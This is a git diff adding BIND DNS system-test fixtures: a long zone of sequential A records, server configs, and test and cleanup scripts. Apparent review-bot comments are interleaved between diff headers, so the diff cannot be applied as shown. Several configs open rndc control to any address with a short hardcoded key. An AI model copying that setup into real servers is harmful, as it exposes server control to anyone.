10.0.12.174 + A 10.0.12.175 + A 10.0.12.176 + A 10.0.12.177 + A 10.0.12.178 + A 10.0.12.179 + A 10.0.12.180 + A 10.0.12.181 + A 10.0.12.182 + A 10.0.12.183 + A 10.0.12.184 + A 10.0.12.185 + A 10.0.12.186 + A 10.0.12.187 + A 10.0.12.188 + A 10.0.12.189 + A 10.0.12.190 + A 10.0.12.191 + A 10.0.12.192 + A 10.0.12.193 + A 10.0.12.194 + A 10.0.12.195 + A 10.0.12.196 + A 10.0.12.197 + A 10.0.12.198 + A 10.0.12.199 + A 10.0.12.200 + A 10.0.12.201 + A 10.0.12.202 + A 10.0.12.203 + A 10.0.12.204 + A 10.0.12.205 + A 10.0.12.206 + A 10.0.12.207 + A 10.0.12.208 + A 10.0.12.209 + A 10.0.12.210 + A 10.0.12.211 + A 10.0.12.212 + A 10.0.12.213 + A 10.0.12.214 + A 10.0.12.215 + A 10.0.12.216 + A 10.0.12.217 + A 10.0.12.218 + A 10.0.12.219 + A 10.0.12.220 + A 10.0.12.221 + A 10.0.12.222 + A 10.0.12.223 + A 10.0.12.224 + A 10.0.12.225 + A 10.0.12.226 + A 10.0.12.227 + A 10.0.12.228 + A 10.0.12.229 + A 10.0.12.230 + A 10.0.12.231 + A 10.0.12.232 + A 10.0.12.233 + A 10.0.12.234 + A 10.0.12.235 + A 10.0.12.236 + A 10.0.12.237 + A 10.0.12.238 + A 10.0.12.239 + A 10.0.12.240 + A 10.0.12.241 + A 10.0.12.242 + A 10.0.12.243 + A 10.0.12.244 + A 10.0.12.245 + A 10.0.12.246 + A 10.0.12.247 + A 10.0.12.248 + A 10.0.12.249 + A 10.0.12.250 + A 10.0.12.251 + A 10.0.12.252 + A 10.0.12.253 + A 10.0.12.254 + A 10.0.12.255 + A 10.0.13.0 + A 10.0.13.1 + A 10.0.13.2 + A 10.0.13.3 + A 10.0.13.4 + A 10.0.13.5 + A 10.0.13.6 + A 10.0.13.7 + A 10.0.13.8 + A 10.0.13.9 + A 10.0.13.10 + A 10.0.13.11 + A 10.0.13.12 + A 10.0.13.13 + A 10.0.13.14 + A 10.0.13.15 + A 10.0.13.16 + A 10.0.13.17 + A 10.0.13.18 + A 10.0.13.19 + A 10.0.13.20 + A 10.0.13.21 + A 10.0.13.22 + A 10.0.13.23 + A 10.0.13.24 + A 10.0.13.25 + A 10.0.13.26 + A 10.0.13.27 + A 10.0.13.28 + A 10.0.13.29 + A 10.0.13.30 + A 10.0.13.31 + A 10.0.13.32 + A 10.0.13.33 + A 10.0.13.34 + A 10.0.13.35 + A 10.0.13.36 + A 10.0.13.37 + A 10.0.13.38 + A 10.0.13.39 + A 10.0.13.40 + A 10.0.13.41 + A 10.0.13.42 + A 10.0.13.43 + A 10.0.13.44 + A 10.0.13.45 + A 
10.0.13.46 + A 10.0.13.47 + A 10.0.13.48 + A 10.0.13.49 + A 10.0.13.50 + A 10.0.13.51 + A 10.0.13.52 + A 10.0.13.53 + A 10.0.13.54 + A 10.0.13.55 + A 10.0.13.56 + A 10.0.13.57 + A 10.0.13.58 + A 10.0.13.59 + A 10.0.13.60 + A 10.0.13.61 + A 10.0.13.62 + A 10.0.13.63 + A 10.0.13.64 + A 10.0.13.65 + A 10.0.13.66 + A 10.0.13.67 + A 10.0.13.68 + A 10.0.13.69 + A 10.0.13.70 + A 10.0.13.71 + A 10.0.13.72 + A 10.0.13.73 + A 10.0.13.74 + A 10.0.13.75 + A 10.0.13.76 + A 10.0.13.77 + A 10.0.13.78 + A 10.0.13.79 + A 10.0.13.80 + A 10.0.13.81 + A 10.0.13.82 + A 10.0.13.83 + A 10.0.13.84 + A 10.0.13.85 + A 10.0.13.86 + A 10.0.13.87 + A 10.0.13.88 + A 10.0.13.89 + A 10.0.13.90 + A 10.0.13.91 + A 10.0.13.92 + A 10.0.13.93 + A 10.0.13.94 + A 10.0.13.95 + A 10.0.13.96 + A 10.0.13.97 + A 10.0.13.98 + A 10.0.13.99 + A 10.0.13.100 + A 10.0.13.101 + A 10.0.13.102 + A 10.0.13.103 + A 10.0.13.104 + A 10.0.13.105 + A 10.0.13.106 + A 10.0.13.107 + A 10.0.13.108 + A 10.0.13.109 + A 10.0.13.110 + A 10.0.13.111 + A 10.0.13.112 + A 10.0.13.113 + A 10.0.13.114 + A 10.0.13.115 + A 10.0.13.116 + A 10.0.13.117 + A 10.0.13.118 + A 10.0.13.119 + A 10.0.13.120 + A 10.0.13.121 + A 10.0.13.122 + A 10.0.13.123 + A 10.0.13.124 + A 10.0.13.125 + A 10.0.13.126 + A 10.0.13.127 + A 10.0.13.128 + A 10.0.13.129 + A 10.0.13.130 + A 10.0.13.131 + A 10.0.13.132 + A 10.0.13.133 + A 10.0.13.134 + A 10.0.13.135 + A 10.0.13.136 + A 10.0.13.137 + A 10.0.13.138 + A 10.0.13.139 + A 10.0.13.140 + A 10.0.13.141 + A 10.0.13.142 + A 10.0.13.143 + A 10.0.13.144 + A 10.0.13.145 + A 10.0.13.146 + A 10.0.13.147 + A 10.0.13.148 + A 10.0.13.149 + A 10.0.13.150 + A 10.0.13.151 + A 10.0.13.152 + A 10.0.13.153 + A 10.0.13.154 + A 10.0.13.155 + A 10.0.13.156 + A 10.0.13.157 + A 10.0.13.158 + A 10.0.13.159 + A 10.0.13.160 + A 10.0.13.161 + A 10.0.13.162 + A 10.0.13.163 + A 10.0.13.164 + A 10.0.13.165 + A 10.0.13.166 + A 10.0.13.167 + A 10.0.13.168 + A 10.0.13.169 + A 10.0.13.170 + A 10.0.13.171 + A 10.0.13.172 + A 10.0.13.173 + A 
10.0.13.174 + A 10.0.13.175 + A 10.0.13.176 + A 10.0.13.177 + A 10.0.13.178 + A 10.0.13.179 + A 10.0.13.180 + A 10.0.13.181 + A 10.0.13.182 + A 10.0.13.183 + A 10.0.13.184 + A 10.0.13.185 + A 10.0.13.186 + A 10.0.13.187 + A 10.0.13.188 + A 10.0.13.189 + A 10.0.13.190 + A 10.0.13.191 + A 10.0.13.192 + A 10.0.13.193 + A 10.0.13.194 + A 10.0.13.195 + A 10.0.13.196 + A 10.0.13.197 + A 10.0.13.198 + A 10.0.13.199 + A 10.0.13.200 + A 10.0.13.201 + A 10.0.13.202 + A 10.0.13.203 + A 10.0.13.204 + A 10.0.13.205 + A 10.0.13.206 + A 10.0.13.207 + A 10.0.13.208 + A 10.0.13.209 + A 10.0.13.210 + A 10.0.13.211 + A 10.0.13.212 + A 10.0.13.213 + A 10.0.13.214 + A 10.0.13.215 + A 10.0.13.216 + A 10.0.13.217 + A 10.0.13.218 + A 10.0.13.219 + A 10.0.13.220 + A 10.0.13.221 + A 10.0.13.222 + A 10.0.13.223 + A 10.0.13.224 + A 10.0.13.225 + A 10.0.13.226 + A 10.0.13.227 + A 10.0.13.228 + A 10.0.13.229 + A 10.0.13.230 + A 10.0.13.231 + A 10.0.13.232 + A 10.0.13.233 + A 10.0.13.234 + A 10.0.13.235 + A 10.0.13.236 + A 10.0.13.237 + A 10.0.13.238 + A 10.0.13.239 + A 10.0.13.240 + A 10.0.13.241 + A 10.0.13.242 + A 10.0.13.243 + A 10.0.13.244 + A 10.0.13.245 + A 10.0.13.246 + A 10.0.13.247 + A 10.0.13.248 + A 10.0.13.249 + A 10.0.13.250 + A 10.0.13.251 + A 10.0.13.252 + A 10.0.13.253 + A 10.0.13.254 + A 10.0.13.255 + A 10.0.14.0 + A 10.0.14.1 + A 10.0.14.2 + A 10.0.14.3 + A 10.0.14.4 + A 10.0.14.5 + A 10.0.14.6 + A 10.0.14.7 + A 10.0.14.8 + A 10.0.14.9 + A 10.0.14.10 + A 10.0.14.11 + A 10.0.14.12 + A 10.0.14.13 + A 10.0.14.14 + A 10.0.14.15 + A 10.0.14.16 + A 10.0.14.17 + A 10.0.14.18 + A 10.0.14.19 + A 10.0.14.20 + A 10.0.14.21 + A 10.0.14.22 + A 10.0.14.23 + A 10.0.14.24 + A 10.0.14.25 + A 10.0.14.26 + A 10.0.14.27 + A 10.0.14.28 + A 10.0.14.29 + A 10.0.14.30 + A 10.0.14.31 + A 10.0.14.32 + A 10.0.14.33 + A 10.0.14.34 + A 10.0.14.35 + A 10.0.14.36 + A 10.0.14.37 + A 10.0.14.38 + A 10.0.14.39 + A 10.0.14.40 + A 10.0.14.41 + A 10.0.14.42 + A 10.0.14.43 + A 10.0.14.44 + A 10.0.14.45 + A 
10.0.14.46 + A 10.0.14.47 + A 10.0.14.48 + A 10.0.14.49 + A 10.0.14.50 + A 10.0.14.51 + A 10.0.14.52 + A 10.0.14.53 + A 10.0.14.54 + A 10.0.14.55 + A 10.0.14.56 + A 10.0.14.57 + A 10.0.14.58 + A 10.0.14.59 + A 10.0.14.60 + A 10.0.14.61 + A 10.0.14.62 + A 10.0.14.63 + A 10.0.14.64 + A 10.0.14.65 + A 10.0.14.66 + A 10.0.14.67 + A 10.0.14.68 + A 10.0.14.69 + A 10.0.14.70 + A 10.0.14.71 + A 10.0.14.72 + A 10.0.14.73 + A 10.0.14.74 + A 10.0.14.75 + A 10.0.14.76 + A 10.0.14.77 + A 10.0.14.78 + A 10.0.14.79 + A 10.0.14.80 + A 10.0.14.81 + A 10.0.14.82 + A 10.0.14.83 + A 10.0.14.84 + A 10.0.14.85 + A 10.0.14.86 + A 10.0.14.87 + A 10.0.14.88 + A 10.0.14.89 + A 10.0.14.90 + A 10.0.14.91 + A 10.0.14.92 + A 10.0.14.93 + A 10.0.14.94 + A 10.0.14.95 + A 10.0.14.96 + A 10.0.14.97 + A 10.0.14.98 + A 10.0.14.99 + A 10.0.14.100 + A 10.0.14.101 + A 10.0.14.102 + A 10.0.14.103 + A 10.0.14.104 + A 10.0.14.105 + A 10.0.14.106 + A 10.0.14.107 + A 10.0.14.108 + A 10.0.14.109 + A 10.0.14.110 + A 10.0.14.111 + A 10.0.14.112 + A 10.0.14.113 + A 10.0.14.114 + A 10.0.14.115 + A 10.0.14.116 + A 10.0.14.117 + A 10.0.14.118 + A 10.0.14.119 + A 10.0.14.120 + A 10.0.14.121 + A 10.0.14.122 + A 10.0.14.123 + A 10.0.14.124 + A 10.0.14.125 + A 10.0.14.126 + A 10.0.14.127 + A 10.0.14.128 + A 10.0.14.129 + A 10.0.14.130 + A 10.0.14.131 + A 10.0.14.132 + A 10.0.14.133 + A 10.0.14.134 + A 10.0.14.135 + A 10.0.14.136 + A 10.0.14.137 + A 10.0.14.138 + A 10.0.14.139 + A 10.0.14.140 + A 10.0.14.141 + A 10.0.14.142 + A 10.0.14.143 + A 10.0.14.144 + A 10.0.14.145 + A 10.0.14.146 + A 10.0.14.147 + A 10.0.14.148 + A 10.0.14.149 + A 10.0.14.150 + A 10.0.14.151 + A 10.0.14.152 + A 10.0.14.153 + A 10.0.14.154 + A 10.0.14.155 + A 10.0.14.156 + A 10.0.14.157 + A 10.0.14.158 + A 10.0.14.159 + A 10.0.14.160 + A 10.0.14.161 + A 10.0.14.162 + A 10.0.14.163 + A 10.0.14.164 + A 10.0.14.165 + A 10.0.14.166 + A 10.0.14.167 + A 10.0.14.168 + A 10.0.14.169 + A 10.0.14.170 + A 10.0.14.171 + A 10.0.14.172 + A 10.0.14.173 + A 
10.0.14.174 + A 10.0.14.175 + A 10.0.14.176 + A 10.0.14.177 + A 10.0.14.178 + A 10.0.14.179 + A 10.0.14.180 + A 10.0.14.181 + A 10.0.14.182 + A 10.0.14.183 + A 10.0.14.184 + A 10.0.14.185 + A 10.0.14.186 + A 10.0.14.187 + A 10.0.14.188 + A 10.0.14.189 + A 10.0.14.190 + A 10.0.14.191 + A 10.0.14.192 + A 10.0.14.193 + A 10.0.14.194 + A 10.0.14.195 + A 10.0.14.196 + A 10.0.14.197 + A 10.0.14.198 + A 10.0.14.199 + A 10.0.14.200 + A 10.0.14.201 + A 10.0.14.202 + A 10.0.14.203 + A 10.0.14.204 + A 10.0.14.205 + A 10.0.14.206 + A 10.0.14.207 + A 10.0.14.208 + A 10.0.14.209 + A 10.0.14.210 + A 10.0.14.211 + A 10.0.14.212 + A 10.0.14.213 + A 10.0.14.214 + A 10.0.14.215 + A 10.0.14.216 + A 10.0.14.217 + A 10.0.14.218 + A 10.0.14.219 + A 10.0.14.220 + A 10.0.14.221 + A 10.0.14.222 + A 10.0.14.223 + A 10.0.14.224 + A 10.0.14.225 + A 10.0.14.226 + A 10.0.14.227 + A 10.0.14.228 + A 10.0.14.229 + A 10.0.14.230 + A 10.0.14.231 + A 10.0.14.232 + A 10.0.14.233 + A 10.0.14.234 + A 10.0.14.235 + A 10.0.14.236 + A 10.0.14.237 + A 10.0.14.238 + A 10.0.14.239 + A 10.0.14.240 + A 10.0.14.241 + A 10.0.14.242 + A 10.0.14.243 + A 10.0.14.244 + A 10.0.14.245 + A 10.0.14.246 + A 10.0.14.247 + A 10.0.14.248 + A 10.0.14.249 + A 10.0.14.250 + A 10.0.14.251 + A 10.0.14.252 + A 10.0.14.253 + A 10.0.14.254 + A 10.0.14.255 + A 10.0.15.0 + A 10.0.15.1 + A 10.0.15.2 + A 10.0.15.3 + A 10.0.15.4 + A 10.0.15.5 + A 10.0.15.6 + A 10.0.15.7 + A 10.0.15.8 + A 10.0.15.9 + A 10.0.15.10 + A 10.0.15.11 + A 10.0.15.12 + A 10.0.15.13 + A 10.0.15.14 + A 10.0.15.15 + A 10.0.15.16 + A 10.0.15.17 + A 10.0.15.18 + A 10.0.15.19 + A 10.0.15.20 + A 10.0.15.21 + A 10.0.15.22 + A 10.0.15.23 + A 10.0.15.24 + A 10.0.15.25 + A 10.0.15.26 + A 10.0.15.27 + A 10.0.15.28 + A 10.0.15.29 + A 10.0.15.30 + A 10.0.15.31 + A 10.0.15.32 + A 10.0.15.33 + A 10.0.15.34 + A 10.0.15.35 + A 10.0.15.36 + A 10.0.15.37 + A 10.0.15.38 + A 10.0.15.39 + A 10.0.15.40 + A 10.0.15.41 + A 10.0.15.42 + A 10.0.15.43 + A 10.0.15.44 + A 10.0.15.45 + A 
10.0.15.46 + A 10.0.15.47 + A 10.0.15.48 + A 10.0.15.49 + A 10.0.15.50 + A 10.0.15.51 + A 10.0.15.52 + A 10.0.15.53 + A 10.0.15.54 + A 10.0.15.55 + A 10.0.15.56 + A 10.0.15.57 + A 10.0.15.58 + A 10.0.15.59 + A 10.0.15.60 + A 10.0.15.61 + A 10.0.15.62 + A 10.0.15.63 + A 10.0.15.64 + A 10.0.15.65 + A 10.0.15.66 + A 10.0.15.67 + A 10.0.15.68 + A 10.0.15.69 + A 10.0.15.70 + A 10.0.15.71 + A 10.0.15.72 + A 10.0.15.73 + A 10.0.15.74 + A 10.0.15.75 + A 10.0.15.76 + A 10.0.15.77 + A 10.0.15.78 + A 10.0.15.79 + A 10.0.15.80 + A 10.0.15.81 + A 10.0.15.82 + A 10.0.15.83 + A 10.0.15.84 + A 10.0.15.85 + A 10.0.15.86 + A 10.0.15.87 + A 10.0.15.88 + A 10.0.15.89 + A 10.0.15.90 + A 10.0.15.91 + A 10.0.15.92 + A 10.0.15.93 + A 10.0.15.94 + A 10.0.15.95 + A 10.0.15.96 + A 10.0.15.97 + A 10.0.15.98 + A 10.0.15.99 + A 10.0.15.100 + A 10.0.15.101 + A 10.0.15.102 + A 10.0.15.103 + A 10.0.15.104 + A 10.0.15.105 + A 10.0.15.106 + A 10.0.15.107 + A 10.0.15.108 + A 10.0.15.109 + A 10.0.15.110 + A 10.0.15.111 + A 10.0.15.112 + A 10.0.15.113 + A 10.0.15.114 + A 10.0.15.115 + A 10.0.15.116 + A 10.0.15.117 + A 10.0.15.118 + A 10.0.15.119 + A 10.0.15.120 + A 10.0.15.121 + A 10.0.15.122 + A 10.0.15.123 + A 10.0.15.124 + A 10.0.15.125 + A 10.0.15.126 + A 10.0.15.127 + A 10.0.15.128 + A 10.0.15.129 + A 10.0.15.130 + A 10.0.15.131 + A 10.0.15.132 + A 10.0.15.133 + A 10.0.15.134 + A 10.0.15.135 + A 10.0.15.136 + A 10.0.15.137 + A 10.0.15.138 + A 10.0.15.139 + A 10.0.15.140 + A 10.0.15.141 + A 10.0.15.142 + A 10.0.15.143 + A 10.0.15.144 + A 10.0.15.145 + A 10.0.15.146 + A 10.0.15.147 + A 10.0.15.148 + A 10.0.15.149 + A 10.0.15.150 + A 10.0.15.151 + A 10.0.15.152 + A 10.0.15.153 + A 10.0.15.154 + A 10.0.15.155 + A 10.0.15.156 + A 10.0.15.157 + A 10.0.15.158 + A 10.0.15.159 + A 10.1.0.0 + A 10.1.0.1 + A 10.1.0.2 + A 10.1.0.3 + A 10.1.0.4 + A 10.1.0.5 + A 10.1.0.6 + A 10.1.0.7 + A 10.1.0.8 + A 10.1.0.9 + A 10.1.0.10 + A 10.1.0.11 + A 10.1.0.12 + A 10.1.0.13 + A 10.1.0.14 + A 10.1.0.15 + A 10.1.0.16 + A 
10.1.0.17 + A 10.1.0.18 + A 10.1.0.19 + A 10.1.0.20 + A 10.1.0.21 + A 10.1.0.22 + A 10.1.0.23 + A 10.1.0.24 + A 10.1.0.25 + A 10.1.0.26 + A 10.1.0.27 + A 10.1.0.28 + A 10.1.0.29 + A 10.1.0.30 + A 10.1.0.31 + A 10.1.0.32 + A 10.1.0.33 + A 10.1.0.34 + A 10.1.0.35 + A 10.1.0.36 + A 10.1.0.37 + A 10.1.0.38 + A 10.1.0.39 + A 10.1.0.40 + A 10.1.0.41 + A 10.1.0.42 + A 10.1.0.43 + A 10.1.0.44 + A 10.1.0.45 + A 10.1.0.46 + A 10.1.0.47 + A 10.1.0.48 + A 10.1.0.49 + A 10.1.0.50 + A 10.1.0.51 + A 10.1.0.52 + A 10.1.0.53 + A 10.1.0.54 + A 10.1.0.55 + A 10.1.0.56 + A 10.1.0.57 + A 10.1.0.58 + A 10.1.0.59 + A 10.1.0.60 + A 10.1.0.61 + A 10.1.0.62 + A 10.1.0.63 + A 10.1.0.64 + A 10.1.0.65 + A 10.1.0.66 + A 10.1.0.67 + A 10.1.0.68 + A 10.1.0.69 + A 10.1.0.70 + A 10.1.0.71 + A 10.1.0.72 + A 10.1.0.73 + A 10.1.0.74 + A 10.1.0.75 + A 10.1.0.76 + A 10.1.0.77 + A 10.1.0.78 + A 10.1.0.79 + A 10.1.0.80 + A 10.1.0.81 + A 10.1.0.82 + A 10.1.0.83 + A 10.1.0.84 + A 10.1.0.85 + A 10.1.0.86 + A 10.1.0.87 + A 10.1.0.88 + A 10.1.0.89 + A 10.1.0.90 diff --git a/bin/tests/system/limits/ns1/named.conf.in b/bin/tests/system/limits/ns1/named.conf.in new file mode 100644 index 0000000..118fdbd --- /dev/null +++ b/bin/tests/system/limits/ns1/named.conf.in 
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ minimal-responses no;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
diff --git a/bin/tests/system/limits/ns1/root.db b/bin/tests/system/limits/ns1/root.db
new file mode 100644
index 0000000..b93cf32
--- /dev/null
+++ b/bin/tests/system/limits/ns1/root.db
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns1.example.
+ns1.example. A 10.53.0.1
diff --git a/bin/tests/system/limits/setup.sh b/bin/tests/system/limits/setup.sh
new file mode 100644
index 0000000..e46affa
--- /dev/null
+++ b/bin/tests/system/limits/setup.sh
@@ -0,0 +1,17 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
diff --git a/bin/tests/system/limits/tests.sh b/bin/tests/system/limits/tests.sh
new file mode 100644
index 0000000..ff774f5
--- /dev/null
+++ b/bin/tests/system/limits/tests.sh
@@ -0,0 +1,56 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+DIGOPTS="-p ${PORT}"
+
+status=0
+
+echo_i "1000 A records"
+$DIG $DIGOPTS +tcp +norec 1000.example. @10.53.0.1 a > dig.out.1000 || status=1
+# $DIG $DIGOPTS 1000.example. @10.53.0.1 a > knowngood.dig.out.1000
+digcomp knowngood.dig.out.1000 dig.out.1000 || status=1
+
+echo_i "2000 A records"
+$DIG $DIGOPTS +tcp +norec 2000.example. @10.53.0.1 a > dig.out.2000 || status=1
+# $DIG $DIGOPTS 2000.example. @10.53.0.1 a > knowngood.dig.out.2000
+digcomp knowngood.dig.out.2000 dig.out.2000 || status=1
+
+echo_i "3000 A records"
+$DIG $DIGOPTS +tcp +norec 3000.example. @10.53.0.1 a > dig.out.3000 || status=1
+# $DIG $DIGOPTS 3000.example. @10.53.0.1 a > knowngood.dig.out.3000
+digcomp knowngood.dig.out.3000 dig.out.3000 || status=1
+
+echo_i "4000 A records"
+$DIG $DIGOPTS +tcp +norec 4000.example. @10.53.0.1 a > dig.out.4000 || status=1
+# $DIG $DIGOPTS 4000.example. @10.53.0.1 a > knowngood.dig.out.4000
+digcomp knowngood.dig.out.4000 dig.out.4000 || status=1
+
+echo_i "exactly maximum rrset"
+$DIG $DIGOPTS +tcp +norec +noedns a-maximum-rrset.example. @10.53.0.1 a > dig.out.a-maximum-rrset \
+ || status=1
+# $DIG $DIGOPTS a-maximum-rrset.example. @10.53.0.1 a > knowngood.dig.out.a-maximum-rrset
+digcomp knowngood.dig.out.a-maximum-rrset dig.out.a-maximum-rrset || status=1
+
+echo_i "exceed maximum rrset (5000 A records)"
+$DIG $DIGOPTS +tcp +norec +noadd 5000.example. @10.53.0.1 a > dig.out.exceed || status=1
+# Look for truncation bit (tc).
+grep 'flags: .*tc.*;' dig.out.exceed > /dev/null || {
+ echo_i "TC bit was not set"
+ status=1
+}
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/logfileconfig/clean.sh b/bin/tests/system/logfileconfig/clean.sh
new file mode 100644
index 0000000..18aa5de
--- /dev/null
+++ b/bin/tests/system/logfileconfig/clean.sh
@@ -0,0 +1,36 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+#
+# Clean up after log file tests
+#
+rm -f ns1/named.conf
+rm -f ns1/named.args
+rm -f ns1/named.pid ns1/named.run ns1/named.run.prev
+rm -f ns1/named.memstats ns1/dig.out
+rm -f ns1/named_log ns1/named_pipe ns1/named_sym
+rm -rf ns1/named_dir
+rm -f ns1/named_deflog
+rm -f ns*/named.lock
+rm -f ns1/query_log
+rm -f ns1/named_iso8601
+rm -f ns1/named_iso8601_utc
+rm -f ns1/rndc.out.test*
+rm -f ns1/dig.out.test*
+rm -f ns1/named_vers
+rm -f ns1/named_vers.*
+rm -f ns1/named_ts
+rm -f ns1/named_ts.*
+rm -f ns1/named_unlimited
+rm -f ns1/named_unlimited.*
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/logfileconfig/named1.args b/bin/tests/system/logfileconfig/named1.args
new file mode 100644
index 0000000..764d4c9
--- /dev/null
+++ b/bin/tests/system/logfileconfig/named1.args
@@ -0,0 +1 @@
+-c named.conf -m record -T nosyslog -d 99 -D logfileconfig-ns1 -X named.lock -U 4
diff --git a/bin/tests/system/logfileconfig/named2.args b/bin/tests/system/logfileconfig/named2.args
new file mode 100644
index 0000000..fb9fe57
--- /dev/null
+++ b/bin/tests/system/logfileconfig/named2.args
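Review bot: The commented-out `# $DIG $DIGOPTS 1000.example. @10.53.0.1 a > knowngood.dig.out.1000` lines in tests.sh (one under each of the 1000/2000/3000/4000 and a-maximum-rrset checks) do not match the live queries, which add `+tcp +norec` (and `+noedns` for the maximum-rrset case), and nothing says what they are for. If they record how the known-good files were produced, regenerating with them as written would presumably query over UDP with recursion requested and not yield the same answers, so the reference data cannot be reproduced from this file. Either drop them or keep them in sync and label them, e.g. `# To regenerate: $DIG $DIGOPTS +tcp +norec 1000.example. @10.53.0.1 a > knowngood.dig.out.1000`.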
@@ -0,0 +1 @@
+-c named.conf -m record -T nosyslog -d 99 -D logfileconfig-ns1 -X named.lock -U 4 -L named_deflog
diff --git a/bin/tests/system/logfileconfig/ns1/named.dirconf.in b/bin/tests/system/logfileconfig/ns1/named.dirconf.in
new file mode 100644
index 0000000..12b3e96
--- /dev/null
+++ b/bin/tests/system/logfileconfig/ns1/named.dirconf.in
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion no;
+ notify yes;
+};
+
+logging {
+ channel default_log {
+ file "/tmp";
+ print-time yes;
+ };
+ category default { default_log; default_debug; };
+ category lame-servers { null; };
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; };
+};
+
+key rndc-key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
diff --git a/bin/tests/system/logfileconfig/ns1/named.iso8601-utc.in b/bin/tests/system/logfileconfig/ns1/named.iso8601-utc.in
new file mode 100644
index 0000000..2b4b181
--- /dev/null
+++ b/bin/tests/system/logfileconfig/ns1/named.iso8601-utc.in
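Review bot: The `controls` statement in named.dirconf.in accepts rndc connections from `allow { any; }` and authenticates them with the short fixed secret `"1234abcd8765"` committed in the file, with no comment marking either as test-only; the same block recurs in named.iso8601-utc.in, named.iso8601.in, named.pipeconf.in, named.plain.in, named.plainconf.in and named.symconf.in. The listener is bound to the 10.53.0.1 test address, so exposure is presumably limited to the test host, but fixtures like these tend to be copied as working examples. I would add above `controls` something like `/* Test fixture only: the fixed rndc key and "allow { any; }" are acceptable solely on the 10.53.0.1 system-test address. */`. Separately, `file "/tmp";` points the log channel at a directory outside the test tree; if that is the deliberate failure case, a one-line comment saying so would keep it from being "corrected" later.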
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion no;
+ notify yes;
+};
+
+logging {
+ channel default_log {
+ file "named_iso8601_utc";
+ print-time iso8601-utc;
+ severity debug 9;
+ };
+ category default { default_log; default_debug; };
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; };
+};
+
+key rndc-key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
diff --git a/bin/tests/system/logfileconfig/ns1/named.iso8601.in b/bin/tests/system/logfileconfig/ns1/named.iso8601.in
new file mode 100644
index 0000000..1eb1aa8
--- /dev/null
